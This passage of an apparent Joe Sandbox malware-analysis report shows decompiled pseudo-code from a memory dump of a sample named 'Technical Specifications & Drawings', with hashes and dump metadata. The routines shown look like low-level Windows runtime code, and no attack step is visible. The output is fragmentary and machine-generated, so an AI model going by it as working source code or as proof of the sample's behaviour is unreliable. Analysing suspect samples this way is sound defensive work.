                                                  						goto L18;
                                                  					} else {
                                                  						goto L3;
                                                  					}
                                                  				} else {
                                                  					L3:
                                                  					if(E017C7D50() != 0) {
                                                  						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                  					}
                                                  					if( *_t27 != 0) {
                                                  						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                  							goto L5;
                                                  						}
                                                  						if(E017C7D50() != 0) {
                                                  							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                  						}
                                                  						if(( *_t29 & 0x00000020) == 0) {
                                                  							goto L5;
                                                  						}
                                                  						L18:
                                                  						return 1;
                                                  					} else {
                                                  						L5:
                                                  						return 0;
                                                  					}
                                                  				}
                                                  			}









                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                  • Instruction ID: edd025439d5655f1dcd12d92ba23d051d7d96961c3036a8a06a5f48194a57442
                                                  • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                  • Instruction Fuzzy Hash: 89110473201A859FE72387ACC948B35BBE8BF40B54F1900E4ED05CB696D728C981C660
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 94%
                                                  			E017B766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                  				char _v8;
                                                  				void* _t22;
                                                  				void* _t24;
                                                  				intOrPtr _t29;
                                                  				intOrPtr* _t30;
                                                  				void* _t42;
                                                  				intOrPtr _t47;
                                                  
                                                  				_push(__ecx);
                                                  				_t36 =  &_v8;
                                                  				if(E017DF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                  					L10:
                                                  					_t22 = 0;
                                                  				} else {
                                                  					_t24 = _v8 + __ecx;
                                                  					_t42 = _t24;
                                                  					if(_t24 < __ecx) {
                                                  						goto L10;
                                                  					} else {
                                                  						if(E017DF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                  							goto L10;
                                                  						} else {
                                                  							_t29 = _v8 + _t42;
                                                  							if(_t29 < _t42) {
                                                  								goto L10;
                                                  							} else {
                                                  								_t47 = _t29;
                                                  								_t30 = _a16;
                                                  								if(_t30 != 0) {
                                                  									 *_t30 = _t47;
                                                  								}
                                                  								if(_t47 == 0) {
                                                  									goto L10;
                                                  								} else {
                                                  									_t22 = L017C4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t22;
                                                  			}











                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                  • Instruction ID: 6557b86021e143fb2050cd2de4dc6941178d2996a1796c5997a9d1ad28ba5bf2
                                                  • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                  • Instruction Fuzzy Hash: 6F01D432300119AFC7249E5ECCC5F9BFBADEBC4B60B280124BA09CB284DB30DC1183A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 69%
                                                  			E017A9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                  				intOrPtr* _t51;
                                                  				intOrPtr _t59;
                                                  				signed int _t64;
                                                  				signed int _t67;
                                                  				signed int* _t71;
                                                  				signed int _t74;
                                                  				signed int _t77;
                                                  				signed int _t82;
                                                  				intOrPtr* _t84;
                                                  				void* _t85;
                                                  				intOrPtr* _t87;
                                                  				void* _t94;
                                                  				signed int _t95;
                                                  				intOrPtr* _t97;
                                                  				signed int _t99;
                                                  				signed int _t102;
                                                  				void* _t104;
                                                  
                                                  				_push(__ebx);
                                                  				_push(__esi);
                                                  				_push(__edi);
                                                  				_t97 = __ecx;
                                                  				_t102 =  *(__ecx + 0x14);
                                                  				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                  					_t102 = _t102 | 0x000007d0;
                                                  				}
                                                  				_t48 =  *[fs:0x30];
                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                  					_t102 = _t102 & 0xff000000;
                                                  				}
                                                  				_t80 = 0x18985ec;
                                                  				E017C2280(_t48, 0x18985ec);
                                                  				_t51 =  *_t97 + 8;
                                                  				if( *_t51 != 0) {
                                                  					L6:
                                                  					return E017BFFB0(_t80, _t97, _t80);
                                                  				} else {
                                                  					 *(_t97 + 0x14) = _t102;
                                                  					_t84 =  *0x189538c; // 0x77576828
                                                  					if( *_t84 != 0x1895388) {
                                                  						_t85 = 3;
                                                  						asm("int 0x29");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						asm("int3");
                                                  						_push(0x2c);
                                                  						_push(0x187f6e8);
                                                  						E017FD0E8(0x18985ec, _t97, _t102);
                                                  						 *((char*)(_t104 - 0x1d)) = 0;
                                                  						_t99 =  *(_t104 + 8);
                                                  						__eflags = _t99;
                                                  						if(_t99 == 0) {
                                                  							L13:
                                                  							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                  							if(__eflags == 0) {
                                                  								E018788F5(_t80, _t85, 0x1895388, _t99, _t102, __eflags);
                                                  							}
                                                  						} else {
                                                  							__eflags = _t99 -  *0x18986c0; // 0x12607b0
                                                  							if(__eflags == 0) {
                                                  								goto L13;
                                                  							} else {
                                                  								__eflags = _t99 -  *0x18986b8; // 0x0
                                                  								if(__eflags == 0) {
                                                  									goto L13;
                                                  								} else {
                                                  									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                  									__eflags =  *((char*)(_t59 + 0x28));
                                                  									if( *((char*)(_t59 + 0x28)) == 0) {
                                                  										E017C2280(_t99 + 0xe0, _t99 + 0xe0);
                                                  										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                  										__eflags =  *((char*)(_t99 + 0xe5));
                                                  										if(__eflags != 0) {
                                                  											E018788F5(0x18985ec, _t85, 0x1895388, _t99, _t102, __eflags);
                                                  										} else {
                                                  											__eflags =  *((char*)(_t99 + 0xe4));
                                                  											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                  												 *((char*)(_t99 + 0xe4)) = 1;
                                                  												_push(_t99);
                                                  												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                  												E017EAFD0();
                                                  											}
                                                  											while(1) {
                                                  												_t71 = _t99 + 8;
                                                  												 *(_t104 - 0x2c) = _t71;
                                                  												_t80 =  *_t71;
                                                  												_t95 = _t71[1];
                                                  												 *(_t104 - 0x28) = _t80;
                                                  												 *(_t104 - 0x24) = _t95;
                                                  												while(1) {
                                                  													L19:
                                                  													__eflags = _t95;
                                                  													if(_t95 == 0) {
                                                  														break;
                                                  													}
                                                  													_t102 = _t80;
                                                  													 *(_t104 - 0x30) = _t95;
                                                  													 *(_t104 - 0x24) = _t95 - 1;
                                                  													asm("lock cmpxchg8b [edi]");
                                                  													_t80 = _t102;
                                                  													 *(_t104 - 0x28) = _t80;
                                                  													 *(_t104 - 0x24) = _t95;
                                                  													__eflags = _t80 - _t102;
                                                  													_t99 =  *(_t104 + 8);
                                                  													if(_t80 != _t102) {
                                                  														continue;
                                                  													} else {
                                                  														__eflags = _t95 -  *(_t104 - 0x30);
                                                  														if(_t95 !=  *(_t104 - 0x30)) {
                                                  															continue;
                                                  														} else {
                                                  															__eflags = _t95;
                                                  															if(_t95 != 0) {
                                                  																_t74 = 0;
                                                  																 *(_t104 - 0x34) = 0;
                                                  																_t102 = 0;
                                                  																__eflags = 0;
                                                  																while(1) {
                                                  																	 *(_t104 - 0x3c) = _t102;
                                                  																	__eflags = _t102 - 3;
                                                  																	if(_t102 >= 3) {
                                                  																		break;
                                                  																	}
                                                  																	__eflags = _t74;
                                                  																	if(_t74 != 0) {
                                                  																		L49:
                                                  																		_t102 =  *_t74;
                                                  																		__eflags = _t102;
                                                  																		if(_t102 != 0) {
                                                  																			_t102 =  *(_t102 + 4);
                                                  																			__eflags = _t102;
                                                  																			if(_t102 != 0) {
                                                  																				 *0x189b1e0(_t74, _t99);
                                                  																				 *_t102();
                                                  																			}
                                                  																		}
                                                  																		do {
                                                  																			_t71 = _t99 + 8;
                                                  																			 *(_t104 - 0x2c) = _t71;
                                                  																			_t80 =  *_t71;
                                                  																			_t95 = _t71[1];
                                                  																			 *(_t104 - 0x28) = _t80;
                                                  																			 *(_t104 - 0x24) = _t95;
                                                  																			goto L19;
                                                  																		} while (_t74 == 0);
                                                  																		goto L49;
                                                  																	} else {
                                                  																		_t82 = 0;
                                                  																		__eflags = 0;
                                                  																		while(1) {
                                                  																			 *(_t104 - 0x38) = _t82;
                                                  																			__eflags = _t82 -  *0x18984c0;
                                                  																			if(_t82 >=  *0x18984c0) {
                                                  																				break;
                                                  																			}
                                                  																			__eflags = _t74;
                                                  																			if(_t74 == 0) {
                                                  																				_t77 = E01879063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                  																				__eflags = _t77;
                                                  																				if(_t77 == 0) {
                                                  																					_t74 = 0;
                                                  																					__eflags = 0;
                                                  																				} else {
                                                  																					_t74 = _t77 + 0xfffffff4;
                                                  																				}
                                                  																				 *(_t104 - 0x34) = _t74;
                                                  																				_t82 = _t82 + 1;
                                                  																				continue;
                                                  																			}
                                                  																			break;
                                                  																		}
                                                  																		_t102 = _t102 + 1;
                                                  																		continue;
                                                  																	}
                                                  																	goto L20;
                                                  																}
                                                  																__eflags = _t74;
                                                  															}
                                                  														}
                                                  													}
                                                  													break;
                                                  												}
                                                  												L20:
                                                  												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                  												 *((char*)(_t99 + 0xe5)) = 1;
                                                  												 *((char*)(_t104 - 0x1d)) = 1;
                                                  												goto L21;
                                                  											}
                                                  										}
                                                  										L21:
                                                  										 *(_t104 - 4) = 0xfffffffe;
                                                  										E017A922A(_t99);
                                                  										_t64 = E017C7D50();
                                                  										__eflags = _t64;
                                                  										if(_t64 != 0) {
                                                  											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                  										} else {
                                                  											_t67 = 0x7ffe0386;
                                                  										}
                                                  										__eflags =  *_t67;
                                                  										if( *_t67 != 0) {
                                                  											_t67 = E01878B58(_t99);
                                                  										}
                                                  										__eflags =  *((char*)(_t104 - 0x1d));
                                                  										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                  											__eflags = _t99 -  *0x18986c0; // 0x12607b0
                                                  											if(__eflags != 0) {
                                                  												__eflags = _t99 -  *0x18986b8; // 0x0
                                                  												if(__eflags == 0) {
                                                  													_t94 = 0x18986bc;
                                                  													_t87 = 0x18986b8;
                                                  													goto L27;
                                                  												} else {
                                                  													__eflags = _t67 | 0xffffffff;
                                                  													asm("lock xadd [edi], eax");
                                                  													if(__eflags == 0) {
                                                  														E017A9240(_t80, _t99, _t99, _t102, __eflags);
                                                  													}
                                                  												}
                                                  											} else {
                                                  												_t94 = 0x18986c4;
                                                  												_t87 = 0x18986c0;
                                                  												L27:
                                                  												E017D9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                  											}
                                                  										}
                                                  									} else {
                                                  										goto L13;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  						return E017FD130(_t80, _t99, _t102);
                                                  					} else {
                                                  						 *_t51 = 0x1895388;
                                                  						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                  						 *_t84 = _t51;
                                                  						 *0x189538c = _t51;
                                                  						goto L6;
                                                  					}
                                                  				}
                                                  			}




















                                                  0x017a90d8
                                                  0x00000000
                                                  0x017a90d8
                                                  0x017a90cf

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3d83c4f06074e364aa4430449d4d89142c4b59e4a60792746ff0dbcbc7fbbc2
                                                  • Instruction ID: 78affe35817ebaeb65fa49609f8f26b74edc49210602bd571ee7a97d42a74c82
                                                  • Opcode Fuzzy Hash: e3d83c4f06074e364aa4430449d4d89142c4b59e4a60792746ff0dbcbc7fbbc2
                                                  • Instruction Fuzzy Hash: 5E01F472501206CFC3268F18D840B12FBA9EB82764F254166E301CB696C770DD51CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 46%
                                                  			E0183C450(intOrPtr* _a4) {
                                                  				signed char _t25;
                                                  				intOrPtr* _t26;
                                                  				intOrPtr* _t27;
                                                  
                                                  				_t26 = _a4;
                                                  				_t25 =  *(_t26 + 0x10);
                                                  				if((_t25 & 0x00000003) != 1) {
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push(0);
                                                  					_push( *((intOrPtr*)(_t26 + 8)));
                                                  					_push(0);
                                                  					_push( *_t26);
                                                  					E017E9910();
                                                  					_t25 =  *(_t26 + 0x10);
                                                  				}
                                                  				if((_t25 & 0x00000001) != 0) {
                                                  					_push(4);
                                                  					_t7 = _t26 + 4; // 0x4
                                                  					_t27 = _t7;
                                                  					_push(_t27);
                                                  					_push(5);
                                                  					_push(0xfffffffe);
                                                  					E017E95B0();
                                                  					if( *_t27 != 0) {
                                                  						_push( *_t27);
                                                  						E017E95D0();
                                                  					}
                                                  				}
                                                  				_t8 = _t26 + 0x14; // 0x14
                                                  				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                  					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                  				}
                                                  				_push( *_t26);
                                                  				E017E95D0();
                                                  				return L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                  			}







                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                  • Instruction ID: 9e6d8f460e56c6099cb8c8a00621c396f952ef514afa0d536e67066a6108a8c5
                                                  • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                  • Instruction Fuzzy Hash: FD019672140606BFE725AF69CC88E62FBADFF94754F144529F254925A4CB21ECA0CAE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E01874015(signed int __eax, signed int __ecx) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				signed char _t10;
                                                  				signed int _t28;
                                                  
                                                  				_push(__ecx);
                                                  				_t28 = __ecx;
                                                  				asm("lock xadd [edi+0x24], eax");
                                                  				_t10 = (__eax | 0xffffffff) - 1;
                                                  				if(_t10 == 0) {
                                                  					_t1 = _t28 + 0x1c; // 0x1e
                                                  					E017C2280(_t10, _t1);
                                                  					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                  					E017C2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x18986ac);
                                                  					E017AF900(0x18986d4, _t28);
                                                  					E017BFFB0(0x18986ac, _t28, 0x18986ac);
                                                  					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                  					E017BFFB0(0, _t28, _t1);
                                                  					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                  					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                  						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                  					}
                                                  					_t10 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                  				}
                                                  				return _t10;
                                                  			}








                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27f3d76f6f479e960a8af7bd6d7d1a7f639de0064567dda683987bd42d5a9eb4
                                                  • Instruction ID: ef8df101d3874111b892ada74ba233df00f6753ffa4ff6f7b9d89a43ffc060bb
                                                  • Opcode Fuzzy Hash: 27f3d76f6f479e960a8af7bd6d7d1a7f639de0064567dda683987bd42d5a9eb4
                                                  • Instruction Fuzzy Hash: 0A017C7220194A7FD752AB69CD88E57F7ACEB56B60B000229F508C7A12CF24ED11CAE4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 61%
                                                  			E0186138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				short _v54;
                                                  				char _v60;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed char* _t21;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t33;
                                                  				intOrPtr _t34;
                                                  				signed int _t35;
                                                  
                                                  				_t32 = __edx;
                                                  				_t27 = __ebx;
                                                  				_v8 =  *0x189d360 ^ _t35;
                                                  				_t33 = __edx;
                                                  				_t34 = __ecx;
                                                  				E017EFA60( &_v60, 0, 0x30);
                                                  				_v20 = _a4;
                                                  				_v16 = _a8;
                                                  				_v28 = _t34;
                                                  				_v24 = _t33;
                                                  				_v54 = 0x1033;
                                                  				if(E017C7D50() == 0) {
                                                  					_t21 = 0x7ffe0388;
                                                  				} else {
                                                  					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                  				}
                                                  				_push( &_v60);
                                                  				_push(0x10);
                                                  				_push(0x20402);
                                                  				_push( *_t21 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                  			}


















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7fb1a23017f02118c927a3a2b2457683b30e503f031dbd06f65d010118b8ca74
                                                  • Instruction ID: 852d2d429883206a386c741eb6f1e8fae891875aa89ff2138e3aa734358a96d6
                                                  • Opcode Fuzzy Hash: 7fb1a23017f02118c927a3a2b2457683b30e503f031dbd06f65d010118b8ca74
                                                  • Instruction Fuzzy Hash: 83019271A00209AFCB14DFA8D949EAEBBF8EF44700F40405AF901EB280DA749B40CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 61%
                                                  			E018614FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				short _v54;
                                                  				char _v60;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed char* _t21;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t33;
                                                  				intOrPtr _t34;
                                                  				signed int _t35;
                                                  
                                                  				_t32 = __edx;
                                                  				_t27 = __ebx;
                                                  				_v8 =  *0x189d360 ^ _t35;
                                                  				_t33 = __edx;
                                                  				_t34 = __ecx;
                                                  				E017EFA60( &_v60, 0, 0x30);
                                                  				_v20 = _a4;
                                                  				_v16 = _a8;
                                                  				_v28 = _t34;
                                                  				_v24 = _t33;
                                                  				_v54 = 0x1034;
                                                  				if(E017C7D50() == 0) {
                                                  					_t21 = 0x7ffe0388;
                                                  				} else {
                                                  					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                  				}
                                                  				_push( &_v60);
                                                  				_push(0x10);
                                                  				_push(0x20402);
                                                  				_push( *_t21 & 0x000000ff);
                                                  				return E017EB640(E017E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                  			}


















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea345e245ef763f72055dd6ee0b583bab8076bcfbc99382e6161cc8aa633e56a
                                                  • Instruction ID: 0bc991298d7fb3486df2713970457d642dd348492c581abf0fe68ea31cba4702
                                                  • Opcode Fuzzy Hash: ea345e245ef763f72055dd6ee0b583bab8076bcfbc99382e6161cc8aa633e56a
                                                  • Instruction Fuzzy Hash: D0019271A00249AFCB14DFA8D849EAEFBF8EF44700F44405AF905EB280DA70DB40CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E017A58EC(intOrPtr __ecx) {
                                                  				signed int _v8;
                                                  				char _v28;
                                                  				char _v44;
                                                  				char _v76;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t10;
                                                  				intOrPtr _t16;
                                                  				intOrPtr _t17;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t28;
                                                  				signed int _t29;
                                                  
                                                  				_v8 =  *0x189d360 ^ _t29;
                                                  				_t10 =  *[fs:0x30];
                                                  				_t27 = __ecx;
                                                  				if(_t10 == 0) {
                                                  					L6:
                                                  					_t28 = 0x1785c80;
                                                  				} else {
                                                  					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                  					if(_t16 == 0) {
                                                  						goto L6;
                                                  					} else {
                                                  						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                  					}
                                                  				}
                                                  				if(E017A5943() != 0 &&  *0x1895320 > 5) {
                                                  					E01827B5E( &_v44, _t27);
                                                  					_t22 =  &_v28;
                                                  					E01827B5E( &_v28, _t28);
                                                  					_t11 = E01827B9C(0x1895320, 0x178bf15,  &_v28, _t22, 4,  &_v76);
                                                  				}
                                                  				return E017EB640(_t11, _t17, _v8 ^ _t29, 0x178bf15, _t27, _t28);
                                                  			}
















                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a66826b4beb745bc0b2fe4c46c08ca9e3375e762e87dce990926a9cf433a2607
                                                  • Instruction ID: c45634f5239af321ce8e1d88381fc1dfd4537bc8148d53ea43347e813ee222fd
                                                  • Opcode Fuzzy Hash: a66826b4beb745bc0b2fe4c46c08ca9e3375e762e87dce990926a9cf433a2607
                                                  • Instruction Fuzzy Hash: E301A731A00115EBC715EB69D8059AEF7ACEF95330F990269EA05DB244DE30DE05CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E017BB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                  				signed char _t11;
                                                  				signed char* _t12;
                                                  				intOrPtr _t24;
                                                  				signed short* _t25;
                                                  
                                                  				_t25 = __edx;
                                                  				_t24 = __ecx;
                                                  				_t11 = ( *[fs:0x30])[0x50];
                                                  				if(_t11 != 0) {
                                                  					if( *_t11 == 0) {
                                                  						goto L1;
                                                  					}
                                                  					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                  					L2:
                                                  					if( *_t12 != 0) {
                                                  						_t12 =  *[fs:0x30];
                                                  						if((_t12[0x240] & 0x00000004) == 0) {
                                                  							goto L3;
                                                  						}
                                                  						if(E017C7D50() == 0) {
                                                  							_t12 = 0x7ffe0385;
                                                  						} else {
                                                  							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                  						}
                                                  						if(( *_t12 & 0x00000020) == 0) {
                                                  							goto L3;
                                                  						}
                                                  						return E01827016(_a4, _t24, 0, 0, _t25, 0);
                                                  					}
                                                  					L3:
                                                  					return _t12;
                                                  				}
                                                  				L1:
                                                  				_t12 = 0x7ffe0384;
                                                  				goto L2;
                                                  			}








                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                  • Instruction ID: 7fe18fddd1e2a682e7d84444d06d445cfb8631a71ce8cf1187c0bbbae1b1e899
                                                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                  • Instruction Fuzzy Hash: D3018472200A84DFE327875DCDC8FB6BBE8EB85750F0900A1FA25CB691D729DD40C621
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E01871074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                  				char _v8;
                                                  				void* _v11;
                                                  				unsigned int _v12;
                                                  				void* _v15;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				char* _t16;
                                                  				signed int* _t35;
                                                  
                                                  				_t22 = __ebx;
                                                  				_t35 = __ecx;
                                                  				_v8 = __edx;
                                                  				_t13 =  !( *__ecx) + 1;
                                                  				_v12 =  !( *__ecx) + 1;
                                                  				if(_a4 != 0) {
                                                  					E0187165E(__ebx, 0x1898ae4, (__edx -  *0x1898b04 >> 0x14) + (__edx -  *0x1898b04 >> 0x14), __edi, __ecx, (__edx -  *0x1898b04 >> 0x14) + (__edx -  *0x1898b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                  				}
